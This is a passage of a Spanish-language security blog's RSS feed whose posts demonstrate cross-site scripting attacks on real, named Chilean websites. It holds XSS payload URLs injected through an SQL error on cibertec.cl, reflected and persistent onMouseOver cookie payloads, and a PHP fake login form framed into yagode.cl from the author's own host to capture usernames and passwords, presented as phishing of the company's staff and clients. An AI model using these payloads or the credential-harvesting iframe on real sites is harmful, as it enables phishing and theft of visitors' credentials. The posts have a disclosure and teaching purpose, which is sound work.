href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc%2F&amp;linkname=Grave%20vulnerabilidad%20del%20tipo%20Cross-Site%20Scripting%20en%20sitio%20web%20de%20RedBanc" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc%2F&amp;linkname=Grave%20vulnerabilidad%20del%20tipo%20Cross-Site%20Scripting%20en%20sitio%20web%20de%20RedBanc" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc%2F&amp;linkname=Grave%20vulnerabilidad%20del%20tipo%20Cross-Site%20Scripting%20en%20sitio%20web%20de%20RedBanc" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc%2F&amp;linkname=Grave%20vulnerabilidad%20del%20tipo%20Cross-Site%20Scripting%20en%20sitio%20web%20de%20RedBanc" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc%2F&amp;linkname=Grave%20vulnerabilidad%20del%20tipo%20Cross-Site%20Scripting%20en%20sitio%20web%20de%20RedBanc" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fvulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc%2F&amp;linkname=Grave%20vulnerabilidad%20del%20tipo%20Cross-Site%20Scripting%20en%20sitio%20web%20de%20RedBanc">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-xss-en-sitio-web-de-redbanc/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Explotar XSS mediante SQL Injection</title>
		<link>http://blog.zerial.org/seguridad/explotar-xss-mediante-sql-injection/</link>
		<comments>http://blog.zerial.org/seguridad/explotar-xss-mediante-sql-injection/#comments</comments>
		<pubDate>Sat, 30 Jan 2010 19:39:53 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Sitios Vulnerables]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[sitios vulnerables]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[sqli]]></category>
		<category><![CDATA[vulnerabilidad]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1479</guid>
		<description><![CDATA[Para complementar un poco lo que publicó d3m4s1@d0v1v0 en ITFreekZone sobre el Reflected XSS mediante SQL Injection, me gustaría demostrarles otra manera de realizar Cross-Site Scripting aprovechandose de una vulnerabilidad de inyección SQL. La teoría es muy sencilla, basta con que encontremos un sitio vulnerable a inyección SQL, no importa que tenga protecciónes contra comillas [...]]]></description>
			<content:encoded><![CDATA[<p>Para complementar un poco lo que publicó <em>d3m4s1@d0v1v0</em> en <a href="http://itfreekzone.blogspot.com/2010/01/reflected-xss-traves-de-sql-injection.html" target="_blank">ITFreekZone sobre el Reflected XSS mediante SQL Injection</a>, me gustaría demostrarles otra manera de realizar <em>Cross-Site Scripting</em> aprovechandose de una vulnerabilidad de inyección SQL.<br />
La teoría es muy sencilla, basta con que encontremos un sitio vulnerable a inyección SQL, no importa que tenga protecciónes contra comillas simples o dobles, o similar, basta con que podamos generar un error por lado del servidor por ejemplo cambiando un número (id) por una letra (en el caso de oracle, sql server u otros que tengan problemas de compatibilidad por el tipo de dato pasado), agregas signos raros o una comilla obligando a que el servidor arroje un error de sintáxis, lo que vamos a hacer es <strong>insertar código javascript justo donde se genera el error sql</strong>.</p>
<p><span id="more-1479"></span></p>
<p>Ahora vamos a la práctica, se los enseñaré mediante un ejemplo real buscando un sitio web al azar con la ayuda de Google. Encontramos el sitio &#8220;Cibertec.cl&#8221; que al parecer cumple todo para poder explotarla.Ç<br />
Si ingresamos al sitio <strong>http://www.cibertec.cl</strong> y revisamos el tipo de links que contiene, podemos darnos cuenta fácilmente que puede  ser vulnerable a SQLi.</p>
<p style="text-align: center;"><a href="http://blog.zerial.org/wp-content/uploads/2010/01/cibertec_vulnerable.png"><img class="aligncenter size-full wp-image-1494" title="cibertec_vulnerable" src="http://blog.zerial.org/wp-content/uploads/2010/01/cibertec_vulnerable.png" alt="" width="510" height="386" /></a></p>
<p>Vamos a comprobarlo cambiando el número <strong>587</strong> por una comilla simple. Entonces ingresamos a <strong>http://www.cibertec.cl/detalle.php?item=&#8217;</strong> y obtenemos el siguiente mensaje:</p>
<blockquote><p><strong>Database error:</strong> Invalid SQL: SELECT * FROM inventory WHERE id = &#8216;<br />
<strong>MySQL Error</strong>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#8221;&#8217; at line 1)<br />
Session halted.</p></blockquote>
<p>Si nos fijamos en la línea donde nos muestra la consulta SQL podemos ver que al final pone &#8220;<em>WHERE id = &#8216;</em>&#8220;. Pues esa comilla simple que se ve depsues del signo igual es la comilla que nosotros pusimos en el navegador. De esta misma forma, si agregamos la palabra &#8220;<em>prueba</em>&#8221; luego de la comilla simple, podemos ver el siguiente mensaje:</p>
<blockquote><p><strong>Database error:</strong> Invalid SQL: SELECT * FROM inventory WHERE id = &#8216;prueba<br />
<strong>MySQL Error</strong>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#8221;prueba&#8217; at line 1)<br />
Session halted.</p></blockquote>
<p>Ahi aparece la comilla simple seguida de la palabra prueba, justo lo que nosotros escribimos. Bien, ya manejamos lo que queremos que se muestre, ahora debemos insertar el código malicioso.</p>
<p><strong>Prueba de concepto (PoC)</strong></p>
<p>Vamos a aprovecharnos de ésta vulnerabilidad de SQL Injection para realizar phishing y para intentar robar una credencial mediante XSS.</p>
<ol>
<li><strong>Phishing</strong>: Vamos a añadir un iframe con un sitio especialmente preparado para éste fin. Pueden hacer la prueba incrustando el sitio de Google: <em>http://www.cibertec.cl/detalle.php?item=%27%3Ciframe%20src=http://www.google.cl%3E%3C/iframe%3E<br />
</em> (puede leer más sobre esto en <a href="http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/" target="_blank">un post que publiqué</a> hace un tiempo)</li>
<li><strong>Robo de credenciales</strong>: El típico aprovechamiento de Cross-Site Scripting usando javascript para redirigir al usuario a un sitio web cuyos parámetros será una cookie. Por ejemplo: <em>http://www.cibertec.cl/detalle.php?item=%27%3Cscript%3Ealert%28this.cookie%29%3C/script%3E</em></li>
</ol>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/xssph_cibertec.png"><img class="aligncenter size-full wp-image-1498" title="xssph_cibertec" src="http://blog.zerial.org/wp-content/uploads/2010/01/xssph_cibertec.png" alt="" width="613" height="360" /></a></p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2010/01/xss_cibertec.png"><img class="aligncenter size-full wp-image-1499" title="xss_cibertec" src="http://blog.zerial.org/wp-content/uploads/2010/01/xss_cibertec.png" alt="" width="622" height="194" /></a></p>
<p>De esta manera podemos afirmar que el sitio web Cibertec.cl es vulnerable a SQL Injection y Cross-Site Scriting.</p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fexplotar-xss-mediante-sql-injection%2F&amp;linkname=Explotar%20XSS%20mediante%20SQL%20Injection">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/explotar-xss-mediante-sql-injection/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>El futuro de los ataques Cross-Site Scripting (XSS)</title>
		<link>http://blog.zerial.org/seguridad/el-futuro-de-los-ataques-cross-site-scripting-xss/</link>
		<comments>http://blog.zerial.org/seguridad/el-futuro-de-los-ataques-cross-site-scripting-xss/#comments</comments>
		<pubDate>Sat, 30 Jan 2010 13:58:24 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[seguridad web]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1450</guid>
		<description><![CDATA[Los ataques XSS son cada día más frecuentes, pareciera ser que al desarrollador no le interesa o por desconocimiento no sabe a lo que se está exponiendo, pero por otro lado, los desarrolladores de los navegadores si están concientes y desarrollan técnicas anti XSS. La forma más común de realizar un ataque XSS es insertando [...]]]></description>
			<content:encoded><![CDATA[<p>Los ataques XSS son cada día más frecuentes, pareciera ser que al desarrollador no le interesa o por desconocimiento no sabe a lo que se está exponiendo, pero por otro lado, los desarrolladores de los navegadores si están concientes y desarrollan técnicas anti XSS. La forma más común de realizar un ataque XSS es insertando tags cómo parámetor de URL o bien dentro de un campo del formulario, como por ejemplo el conocido:</p>
<blockquote><p>&lt;script&gt;alert(&#8216;this.cookie&#8217;)&lt;/script&gt;</p></blockquote>
<p>Cuando los ataques <strong>XSS</strong> mediante tags no son posibles, existe la posibilidad de realizar el ataque usando las propiedades de cada tag. Puede ser usando el atributo <em>style</em>, <em>src</em> o algúnos gatilladores de eventos como onMouseOver, etc. Para poder realizar el ataque es necesario usar comillas (simples o dobles), aunque tambien en algunos casos existe la posibilidad de no usarlas, para poder agregar una nueva propiedad al tag en el cual hemos conseguido insertar el código.</p>
<p><span id="more-1450"></span></p>
<p>En los ataques realizados mediante la propiedad style, podemos usar las siguientes funciones o métodos (en este caso, el código se ejecuta automáticamente al cargar la página):</p>
<ol>
<li>Usando <strong>expression()</strong>, sólo funciona en Internet Explorer anterior a la versión 8.</li>
<li>Usando <strong>background:url()</strong> o <strong>background-img:url()</strong>, sólo funciona en Internet Explorer.</li>
<li>Usando <strong>-moz-binding:url()</strong>, sólo funciona en Mozila y en otros motores basados en Gecko (antes de Firefox 3).</li>
</ol>
<p>Pueden ver un ejemplo de un ataque usando <strong>-moz-binding:url()</strong> y <strong>expression()</strong> en <a href="http://websecurity.com.ua/2932/" target="_blank">éste</a> link (está en un idioma que seguramente no entenderemos pero los ejemplos se entienden sin problemas).</p>
<p>Los ataques vía eventos (<em>handlers</em>) son aplicables de la siguiente forma:</p>
<ol>
<li>Eventos como <strong>onMouseOver</strong>, <strong>onFocus</strong>, <strong>onBlur</strong>, <strong>onSelect</strong>, <strong>onChange</strong>, <strong>onClick</strong>, etc.</li>
<li>Usando <strong>onError</strong>, <strong>onLoad</strong> y <strong>onUnload</strong>, para ejecutar código automáticamente al cargar o cerrar la página.</li>
</ol>
<p>La posibilidad de usar <strong>onLoad</strong>, <strong>onUnload</strong> y <strong>onError</strong> no es muy amenudo y los otros eventos no se ejecutan automáticamente, siempre hay que esperar a que <em>algo</em> los gatille. Por ésto mismo, este tipo de ataque XSS no es muy popular, generalmente se ataca incrustando código en las propiedades tales como <em>style</em>, ya que se ejecuta automáticamente.<br />
Cerca del 2008, la posibilidad de realizar un ataque XSS mediante <em>-moz-binding</em> fue removida (o bueno, fue parcialmente removida ya que aún es posible realizar ataques de éste tipo mediante ficheros xml en el mismo sitio). En el lanzamiento de Internet Explorer 8, a comienzos del 2009, se removió el soporte a la función o método <strong>expression()</strong>. Tambien fue removido el soporte de javascript o vbscript en background-image.<br />
Con los arreglos que se hicieron en los distintos navegadores,  se dificuló el llevar a cabo  ataques Cross-Site Scripting mediante tags. Por otro lado, los navegadores como Opera y Chrome resisten ataques  de éste tipo mediante la propiedad <em>style</em>.<br />
Podemos usar la técnica del <a href="http://websecurity.com.ua/3814/" target="_blank">MouseOverJacking</a>. Con ésta técnica, se puede automatizar el ataque XSS. Es una solución que funciona en todos los navegadores, incluyendo IE8, eludiendo la protección <em>anti-clickjacking</em> que trae incorporada.<br />
<em>MouseOverJacking</em> se puede usar en lugar de <strong>expression()</strong> y <strong>-moz-binding()</strong>. El ataque está automatizado, por lo que el ataque cumpliría el mismo objetivo que <em>expression</em> y <em>-moz-binding</em> y gracias al soporte multi navegador, es posible atacar a más usuarios.<br />
Se puede realizar con MouseOverJacking lo mismo que con ClickJacking, con la diferencia que el MouseOverJacking es más efectivo, ya que no espera ninguna acción del usuario, no es necesario que el usuario haga click para gatillar el ataque. El ClickJacking espera un click por parte del usuario en cambio el MouseOverJacking simplemente espera el movimiento del ratón.</p>
<p>Ejemplos:</p>
<p><strong>Reflected XSS</strong></p>
<blockquote><p>http://site/script?param=%22%20style=%22width:100%;height:100%;display:block;position:absolute;top:0px;left:0px%22%20onMouseOver=%22alert(document.cookie)%22</p></blockquote>
<p><strong>Persistent XSS</strong></p>
<blockquote><p>&lt;a href=&#8221;#&#8221; style=&#8221;width:100%;height:100%;display:block;position:absolute;top:0px;left:0px&#8221; onMouseOver=&#8221;alert(document.cookie)&#8221;&gt;&amp;nbsp;&lt;/a&gt;</p></blockquote>
<p><em>Este artículo corresponde a una traducción al Español de la <a href="http://websecurity.com.ua/3878/" target="_blank">traducción al Inglés</a> del <a href="http://websecurity.com.ua/3860/" target="_blank">original</a>, extraído de <a href="http://websecurity.com.ua" target="_blank">WebSecurity</a>.</em></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fel-futuro-de-los-ataques-cross-site-scripting-xss%2F&amp;linkname=El%20futuro%20de%20los%20ataques%20Cross-Site%20Scripting%20%28XSS%29">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/el-futuro-de-los-ataques-cross-site-scripting-xss/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Haciendo phishing explotando una vulnerabilidad XSS</title>
		<link>http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/</link>
		<comments>http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/#comments</comments>
		<pubDate>Wed, 23 Dec 2009 23:41:38 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1321</guid>
		<description><![CDATA[Usaré de ejemplo un sitio que ya he usado en alguno de mis post, cuando hice los tests a las empresas de hosting. Mostraré cómo explotar una vulnerabilidad del tipo XSS para hacer phishing, capturar datos de acceso de usuarios para ganar acceso a un sistema, ftp , email, etc. La empresa afectada es una [...]]]></description>
			<content:encoded><![CDATA[<p>Usaré de ejemplo un sitio que ya he usado en <a href="http://blog.zerial.org/seguridad/empresas-de-hosting-y-diseno-web-al-descubierto-dch/" target="_blank">alguno de mis post</a>, cuando hice los <a href="http://blog.zerial.org/seguridad/testing-de-calidad-a-las-empresas-de-hosting-y-desarrollo-web-en-chile/" target="_blank">tests a las empresas de hosting</a>. Mostraré cómo explotar una vulnerabilidad del tipo XSS para hacer phishing, capturar datos de acceso de usuarios para ganar acceso a un sistema, ftp , email, etc.</p>
<p>La empresa afectada es una <a href="http://www.yagode.cl" target="_blank">inmobiliaria y constructora &#8220;Yagode&#8221;</a>, la vulnerabilidad XSS se encuentra en el script &#8220;<em>proyectos.php</em>&#8220;, al no parsear la variable <em>tipo</em>. Tiene protección contra XSS, pero no es efectiva. Podemos comprobar ingresando a</p>
<blockquote><p><a href="http://www.yagode.cl/proyectos.php?Tipo=&lt;script&gt;alert(this)&lt;/script&gt;" target="_blank"><strong>http://www.yagode.cl/proyectos.php?Tipo=&lt;script&gt;alert(this)&lt;/script&gt;</strong></a></p></blockquote>
<p>Obtenemos el mensaje de error <strong>406 &#8220;Not Acceptable&#8221;</strong>,</p>
<blockquote>
<h2>Not Acceptable</h2>
<p>An appropriate representation of the requested resource /proyectos.php could not be found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></blockquote>
<p>Sin embargo, permite incluir otro tipo de código como un <strong>iframe</strong>.</p>
<p><a href="http://blog.zerial.org/wp-content/uploads/2009/12/xss.png"><img class="aligncenter size-medium wp-image-1331" title="xss" src="http://blog.zerial.org/wp-content/uploads/2009/12/xss-300x193.png" alt="" width="300" height="193" /></a></p>
<p><span id="more-1321"></span></p>
<p>Vamos a armar un pequeño código en php con un formulario que nos capture la información, simulando un login, bien simple, que cumpla con el estándar del sitio web (fondo azúl y <strong>bien feo</strong>)</p>
<pre name="code" class="php"><html>
<body bgcolor=#0248BC>
< ?php
if($_GET['login'] == "ok")
        die("user: ".$_POST['user']."pass: ".$_POST['pass']);
?>
<form method="post" action="?login=ok">
Usuario:
<input type="text" name="user"/>
Password:
<input type="password" name="pass"/>
<input type=submit value=Ingresar/>
</form>

</body>
</html>
</pre>
<p>Incluimos nuestro script en el iframe:</p>
<p><a href="http://www.yagode.cl/proyectos.php?Tipo=&lt;iframe frameborder=0 src=http://zerial.org/yagode.php width=500 height=200&lt;/iframe&gt;" target="_blank">http://www.yagode.cl/proyectos.php?Tipo=&lt;iframe frameborder=0 src=http://zerial.org/yagode.php width=500 height=200&lt;/iframe&gt;</a></p>
<p>Ingresamos nuestra información, usuario y contraseña, y vemos como el script php que hicimos se encarga de guardar la información y mostrarla, llenamos el formulario con datos de prueba como usuario=miusuario y password=mipassword, al presionar el botón &#8220;<em>ingresar</em>&#8220;, veremos la siguiente pantalla:</p>
<p><img class="aligncenter size-full wp-image-1337" title="xss2" src="http://blog.zerial.org/wp-content/uploads/2009/12/xss2.png" alt="" width="306" height="229" /></p>
<p><img class="aligncenter size-full wp-image-1338" title="xss3" src="http://blog.zerial.org/wp-content/uploads/2009/12/xss3.png" alt="" width="224" height="179" /></p>
<p>Perfectamente podemos <strong>engañar</strong> a los empleados o clientes de ésta empresa, para que ingresen a éste sitio y nos entreguen información <strong>confidencial</strong>. Con un poco de ingeniería social y tiempo.</p>
<p><strong>NOTA: La empresa encargada de éste sitio fue notificada de los fallos hace mucho tiempo (más de 2 meses)</strong></p>
<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.zerial.org/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fblog.zerial.org%2Fseguridad%2Fhaciendo-phishing-explotando-una-vulnerabilidad-xss%2F&amp;linkname=Haciendo%20phishing%20explotando%20una%20vulnerabilidad%20XSS">Compartir/Guardar</a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.zerial.org/seguridad/haciendo-phishing-explotando-una-vulnerabilidad-xss/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Cruzando la información en un sitio web vulnerable</title>
		<link>http://blog.zerial.org/seguridad/cruzando-la-informacion-en-un-sitio-web-vulnerable/</link>
		<comments>http://blog.zerial.org/seguridad/cruzando-la-informacion-en-un-sitio-web-vulnerable/#comments</comments>
		<pubDate>Sat, 05 Dec 2009 12:49:55 +0000</pubDate>
		<dc:creator>Zerial</dc:creator>
				<category><![CDATA[Documentacion]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[vulnerabilidades web]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.zerial.org/?p=1170</guid>
